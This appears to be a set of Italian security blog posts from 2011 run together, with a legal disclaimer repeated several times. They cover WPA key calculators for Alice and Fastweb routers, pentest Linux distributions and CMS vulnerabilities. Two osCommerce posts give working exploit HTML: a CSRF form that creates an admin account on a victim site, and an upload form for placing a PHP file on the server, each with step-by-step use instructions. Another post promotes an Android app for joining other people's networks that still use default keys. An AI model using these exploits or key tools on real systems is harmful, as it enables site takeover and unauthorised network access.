AGGIORNAMENTO 27/11/2011 – Le Wpa delle reti wireless Fastweb possono essere calcolate direttamente on line tramite il tool Fastweb Wpa Calculator OnLine.

AGGIORNAMENTO 29/11/2011 – Le Wpa delle reti wireless Alice possono essere calcolate direttamente on line tramite il tool Alice Wpa Calculator OnLine.

N.B.

Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).

Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.

L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.

Attualmente è possibile ottenere la chiave WPA di nuove serie di SSID che in precedenza non si potevano calcolare pertanto coloro che mi hanno scritto personalmente o hanno scritto sul blog per richiedere il calcolo di un SSID sono pregati di utilizzare il nuovo software e verificare se così facendo riescono ad ottenere la chiave della connessione WiFi.

Per la nuova versione si ringrazia il lavoro svolto da Francesco Pompili che con il suo blog provvede a pubblicare periodicamente nuovi software e nuove info utili allo studio approfondito delle reti e dei loro dispositivi.

L’utilizzo di Wpa Tester  è molto semplice, basterà avviarlo, andare nella Tab “ALICE AGPF” e a questo punto inserire il SSID della propria connessione Alice e nel riquadro in basso verranno visualizzati tutte le possibili chiavi WPA per l’accesso alla rete.

Wpa Tester 1.6 DOWNLOAD

A questo articolo è stata pubblicata la nuova versione che include anche il calcolo Wpa delle chiavi TeleTu.

AGGIORNAMENTO 27/11/2011 – Le Wpa delle reti wireless Fastweb possono essere calcolate direttamente on line tramite il tool Fastweb Wpa Calculator OnLine.

AGGIORNAMENTO 29/11/2011 – Le Wpa delle reti wireless Alice possono essere calcolate direttamente on line tramite il tool Alice Wpa Calculator OnLine.

N.B.

Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).

Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.

L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.

Follow this link:
Facebook, nuovamente attivo il cookie guardone

Source: Webnews

Tale algoritmo si basa su un’equazione tra SSID della rete, Seriale del Router e due costanti ceh sono state definite “numeri magici” o “magic numbers” (q e k).

Avendo a disposizione tutti questi fattori è possibile calcolare correttamente la password Wpa delle connessioni Telecom Alice. Da novembre ad oggi i “magic numbers” sono stati man mano aggiornati permettendo di ampliare le connessioni calcolabili.

Abbiamo provveduto ad aggiornare il Tool disponibile trami il nostro sito con i magic number aggiornati a Maggio 2011.

Dal seguente link potete scaricare il file aggiornato:

Alice e Fastweb Wpa Calculator DOWNLOAD

AGGIORNAMENTO 27/11/2011 – Le Wpa delle reti wireless Fastweb possono essere calcolate direttamente on line tramite il tool Fastweb Wpa Calculator OnLine.

AGGIORNAMENTO 29/11/2011 – Le Wpa delle reti wireless Alice possono essere calcolate direttamente on line tramite il tool Alice Wpa Calculator OnLine.

N.B.

Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).

Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.

L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.

Le principali novità e fix riguardano:

• Migliorie di sicurezza e delle query di tassonomia
• Fix di sicurezza del redirect canonical redirects
• Fix di sicurezza media
• Aggiunta prevenzione da azioni malevole tramite file host
• Pulizia del vecchio file di importazione di WordPress se l’importazione non giunge a termine.
• Aggiunta protezione “clickjacking”

Provvedere quanto prima ad aggiornare il vostro WordPress dall’Area Admin o scaricandolo da qui.

FONTE: http://www.wordpress-it.it/2011/05/25/wordpress-3-1-3-in-inglese/

Rilasciata nel gennaio scorso promette già una nuova versione, la 2.01, per il prossimo Dicembre 2011.

BackBox Linux è basata sul kernel Ubuntu 10.04 LTS e ciò garantisce performance e, cosa più importante, supporto e aggiornamenti da parte del Team Ubuntu. Utilizza inoltre l’interfaccia XFCE che è veloce e leggera garantendo un ridotto consumo delle risorse e la possibilità di funzionare su Hardware ormai datato. All’inizio erano stati inseriti repository OSWAP WTE mentre nella versione attualmente rilasciata BackBox ha i propri repository su Launchpad. Attualmente sono presenti circa 100 tools di sicurezza più che sufficienti per realizzare pentest sotto ogni punto di vista (network, applicativo, web, etc..) e grazie al gestore dei pacchetti Synaptic sarà possibile aggiungerne (o rimuoverne) altri con molta facilità.

La prima versione è disponibile sia per sistemi a 32bit sia a 64bit e, per essere una new entry non ha nulla da invidiare a BackTrack e dimostra di essere una validissima alternativa.

Potete scaricare la vostra distribuzione di BackBox Linux dalla pagina di Download Ufficiale.

A questo link, invece, potrete vedere i video del Canale YouTube di OpenSoluzioni, l’azienda di Raffaele Forte, dove vengono pubblicati video tutorial sull’utilizzo e l’installazione di BackBox Linux.

Consiglio a tutti di provarla (io l’ho già messa nel mio portatile a fianco di BackTrack5), soprattutto perché è una distro tutta italiana!!

Complimenti a Raffaele e Simone!

Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente “stabili” sono state bucate da molteplici vulnerabilità. Nella release specifica, che ripetiamo si tratta di una alpha, sono state individuate vulnerabilità di tipo Xss, Full Path Disclosure, Local File Inclusion e XSRF.

La Full Path Disclosure consiste nell’interrogare alcuni file del Template di OsCommerce che, andando in errore, mostrano a video la full path della loro posizione sul Server. Con questa sola informazione si può fare poco ma, anche in questo caso, se unita ad altri tipi di attacchi diventa una utile informazione. La XSS permette di iniettare codice JavaScript sfruttando una falla del file “products.php” mentre la Local File Inclusion consente di richiamare file presenti sul Server sfruttando la procedura di disinstallazione moduli del Cms che non verifica opportunamente i parametri passati e permette di accettare in input qualsiasi path raggiungibile.

Anche in questo caso c’è una falla più grave delle altre e a mio avviso è la XSRF che permette di inviare comandi all’applicativo senza che questi vengano verificati in alcun modo. Nel caso specifico sarà possibile creare un nuovo Admin sull’OsCommerce.

Basterà creare una pagina “.html” contenente il seguente codice:

<html>
<body>
<form action="http://<sito vittima>/admin/index.php?administrators&action=save" method="post">
<input type="text" name="user_name" value="<nomeutente>">
<input type="text" name="user_password" value="<password>">
<input type="text" name="modules[]" value="0?>
<input type="hidden" name="subaction" value="confirm"/>
<input type="submit" value="Save">
</form>
</body>
</html>

Ovviamente dovrete sostituire i seguenti parametri:

<sito vittima> con il dominio del sito in cui si vuole creare l’account

<nomeutente> con il nome utente del nuovo Admin

<password> con la password da associare al nuovo Admin

Una volta creata la pagina richiamatela dal vostro Browser e cliccate su “Save”.

Se tutto è andato a buon fine accedendo all’url:

http://<sito vittima>/admin/

potrete loggarvi come Admin con i dati appena inseriti.

Per informazioni dettagliate vi rimando al link del Dr. Alberto Fontanella autore dell’articolo.

osCommerce v3.0a5 [ Multiple Vulnerabilities ]

La versione vulnerabile è l’ultima disponibile ossia la 1.3.9h e presenta vulnerabilità di vario tipo: Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File Upload.

La vulnerabilità Full Path Disclosure permette, se la gestione degli errori è configurata per mostrarli a video, di conoscere la path assoluta dell’applicativo. Di per sé non è una falla che consente di effettuare alcun tipo di azione ma l’informazione che si ottiene potrebbe essere utile se unita ad attacchi che vanno a scrivere sul FileSystem o similari. Le due XSS, invece, non affliggono l’attuale 1.3.9h ma tutte le versioni precedenti. Le vulnerabilità sono localizzate nel campo “Quantità” del carrello che permette l‘injection di codice XSS e nell’Area Amministrativa “Location/Taxes”. Per quest’ultima, quindi, si presume che si abbia già l’accesso Admin.

L’ultima vulnerabilità, la più grave, riguarda invece il componente Banner (banner_manager.php) che, così come per OsCommerce, permette di effettuare l’upload di files che verranno salvati nella cartella “images”.

Per informazioni dettagliate vi rimando al link del Dr. Alberto Fontanella autore dell’articolo.

Zen Cart <= v.1.3.9h [ Multiple Vulnerabilities ]

Viviani, l’inviato delle Iene, insieme a due hacker in assetto da wardriving mostra in maniera non troppo dettagliata ma di facile comprensione a chiunque l’utilizzo di Aircrack-NG per eseguire un bruteforce su una rete Wpa.

Una utile visione per chi vuole vedere e comprendere in grandi linee il funzionamento e la vulnerabilità delle reti WiFi disseminate per le nostre città.

Il video lo potete trovare a questo link.

Proteggete le vostre reti

L’applicazione si chiama Wpa Tester ed è stata sviluppata da Carlo Marinangeli che l’ha resa disponibile su YAAM (Yet Another Android Market) a questo link.

Il funzionamento è esattamente come gli altri applicativi testati e, quindi, una volta scansionate le reti WiFi dal vostro Smartphone o Tablet Android basterà selezionarne una e tentare la connessione. Se la rete avrà ancora la password standard impostata dal Provider permetterà di accedere e navigare liberamente.

Attualmente i Router sui quali è utilizzabile sono i seguenti: Alice Fastweb Vodafone Bbox BigPond Discus DLink DMAX Eircom Huawei JAZZTEL INFINITUM Infostrada O2Wireless Ono Otenet Orange privat SKY SpeedTouch Tecom Thomson Verizon Wifi Wlan YaCom

La versione minima necessaria alla corretta esecuzione è Andorid 1.6.

Buon divertimento

AGGIORNAMENTO 27/11/2011 – Le Wpa delle reti wireless Fastweb possono essere calcolate direttamente on line tramite il tool Fastweb Wpa Calculator OnLine.

N.B.

Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).

Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.

L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.

Per chi non la conoscesse si tratta di una versione di Linux realizzata dallo staff di Offensive-Security configurata e ottimizzata  per le attività di sicurezza informatica quali penetration test, sniffing, wifi hack etc.

Sono presenti di default tutti i tools per mettere in atto le più note tecniche di hacking a qualsiasi livello, sia network che applicativo. Tra i più noti possiamo citare Metasploit, Aircrack-NG, WireShark, Ettercap, Nmap, John The Ripper e molti altri per un totale di 348 tools.

La nuova versione di BackTrack è basata sul performante Kernel Ubuntu Lucid LTS. 2.6.38 ed è stata pensata per essere supportata su tutte le piattaforme (ARM, 32bit, 64bit). Integra inoltre 3 diverse interfacce grafiche così che ognuno possa scegliere quella che preferisce tra Gnome 4.6, KDE e FluxBox.

I tools presenti permettono, come detto, di eseguire tutti i tipi di scansione per attività di sicurezza informatica. Utilizzando BackTrack 5 potrete effettuare verifiche alle applicazioni Web (Xss,Clickjacking, Sql Injection, etc), analisi delle reti e loro mappatura, verifica di vulnerabilità di un host, verifica e hack delle reti wifi, pentesting report, reverse engineering, sniffing di varie tipologie di pacchetti, crack/decrypt delle password e molti altri ancora.

La novità nella novità è che ad appena 8 giorni dal rilascio sul sito XDA è disponibile la versione lite (700 Mb) di BackTrack 5 per piattaforma Android. Si tratta di un’iniziativa personale di alcuni membri dello staff che tengono a precisare di non garantire né il funzionamento né eventuali danni ai dispositivi. Certo è che se si riuscisse a passare BackTrack su un Tablet i wardrivers potrebbero avere vita molto più facile…

Nell’attesa possiamo leggere questo interessante articolo dove viene dimostrato il corretto funzionamento di BackTrack5 su un Motorola Xoom.

Per il momento il succo è che qualsiasi cosa vogliate testare nel campo della “sicurezza informatica” necessitate sicuramente di un PC con installata BackTrack 5.

DOWNLOAD

Il video di presentazione:

BackTrack 5 – Penetration Testing Distribution from Offensive Security on Vimeo.

A distanza di 2 anni i programmatori, dopo una lunga latitanza, hanno rilasciato 2 nuove versioni: la 2.3.1 e la nuova 3.0.1. Il rilascio delle due nuove versioni non ha avuto molto risalto e tra gli utilizzatori di questo applicativo pochi hanno provveduto ad aggiornare.

Lo scorso 14 Maggio, però, è stata scoperta una nuova falla (purtoppo molto simile alla precedente) che permette l’upload di files nella cartella “/images” senza dover utilizzare tecniche particolari o rubare i dati di Amministratore.

Come riportato qui il componente Banner (banner_manager.php) della nuova versione 2.3.1 di OsCommerce soffre di una vulnerabilità che consente di uploadare files sul sito “vittima” semplicemente creando sul proprio PC una pagina html con il seguente codice:

<form name=”new_banner” action=”http://site/path/admin/banner_manager.php/login.php?action=insert” method=”post” enctype=”multipart/form-data”><br>
<input type=”file” name=”banners_image”><br>
<input name=”submit” value=” Save ” type=”submit”></form>

Basterà sostituire a “site/path” il dominio e l’eventuale sottocartella del sito basato su questo Cms e salvare il file in formato “.html”.

Apritelo con il vostro Browser e vi troverete davanti un form di upload file.

Scegliete il vostro file e fate l’upload; una volta terminata l’operazione potrete interrogare il file richiamando l’url nel seguente modo:

http://site/path/images/<fileinviato.php>

Analizzando alcuni casi di utilizzo di questa vulnerabilità ho riscontrato casi di iniezione di virus/malware come già riscontrato sempre nel 2009.

Non appena avrò maggiori informazioni provvederò a tenervi aggiornati.

La vulnerabilità è particolarmente grave perchè colpisce piú del 99% dei device attivi, ne risultano immuni infatti solo le versioni Gingerbread 2.3.4 e Honeycomb 3.0 e 3.1.
Per fortuna, in attesa di ricevere il fix nei prossimi giorni gli utenti potranno comunque proteggersi mettendo in pratica alcuni accorgimenti.
Il problema di sicurezza si verifica solo se un utente si collega ad una rete wifi libera, quindi chiunque si connetta abitualmente ad hotspot o lo abbia fatto di recente farebbe meglio a disattivare l’opzione di connessione automatica alle reti wifi ed eliminando il consenso a quelle utilizzate di recente, nel caso la rete free fosse di proprietà il consiglio é ovviamente quello di impostare una protezione, ma questo é una buona norma sempre, non solo in casi di vulnerabilità come quella di cui stiamo parlando in questo articolo.
Allo stato attuale, in attesa della patch di Google, il rischio che si corre é quello che un utente non autorizzato possa accedere ai nostri dati contenuti nel calendario e nei contatti di Android perché lo scambio di autorizzazione tra il client e server non avviene tramite protocollo https (Hyper Text Transfer Protocol Secure), ma tramite semplice http.
Tuttavia Google sta valutando anche la connessione alle librerie di Picasa che sembrerebbero anch’esse affette dalla stessa vulnerabilità, un motivo in piú per diffidare delle reti aperte fino a che non sarà cessato del tutto questo giustificato allarme.

Rim

Come saprete il tablet di Research In Motion è basato sul rivoluzionario e solido sistema operativo QNX, grazie al quale gode forse del miglior multitasking e prestazioni in commercio.

Visto che tale SDK non è ancora stato rilasciato sembrava impossibile poter sviluppare software senza un tale strumento di programmazione, ma uno sviluppatore di nome Adam Bell ha dimostrato come bypassare l’ambiente Adobe Air su cui è basata l’interfaccia grafica del tablet.

Adam sostiene che, non senza alcuni tweak, è possibile installare su Playbook direttamente le app sviluppate  per QNX  tramite il suo ambiente di programmazione (questo disponibile invece da tempo) chiamato Neutrino SDP e avviarle nativamente sul tablet Rim.

Tutto ciò è possibile perchè l’ambiente di sviluppo desktop  di QNX contiene un cross-compiler, cioè un compilatore in grado di creare eseguibili per varie piattaforme , da quella i386 a quella ARM.Proprio quest’ultima è alla base dei moderni smartphone e tablet; Tegra2 e tutti i moderni chip dualcore in uscita nel 2011 sono infatti basati su una architettura ARM Cortex A9 o derivata, come la stessa CPU di Texas Instruments che muove il Blackberry Playbook.

Le applicazioni possono essere quindi scritte in C/C++ , compilate ed inviate al tablet Rim per essere eseguite.